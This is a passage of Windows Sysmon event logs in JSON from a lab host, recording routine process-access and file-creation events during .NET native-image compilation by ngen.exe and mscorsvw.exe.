C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.350","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001018DD0E00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.412\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00100F9C0F00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.412","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00100F9C0F00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.412\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00100F9C0F00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.412","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00100F9C0F00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.412\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00100F9C0F00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.412","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00100F9C0F00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:42.694\r\nProcessGuid: {41C8662E-2292-5F25-0000-00100F9C0F00}\r\nProcessId: 4548\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c4-0\\System.Runtime.DurableInstancing.dll\r\nCreationUtcTime: 2020-08-01 08:06:42.694","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:42.694","ProcessGuid":"{41C8662E-2292-5F25-0000-00100F9C0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c4-0\\System.Runtime.DurableInstancing.dll","CreationUtcTime":"2020-08-01 08:06:42.694","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.740\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-0010AAE40E00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.740","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-0010AAE40E00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-0010AAE40E00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-0010AAE40E00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-0010AAE40E00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-0010AAE40E00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.772\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00103BA40F00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.772","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00103BA40F00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
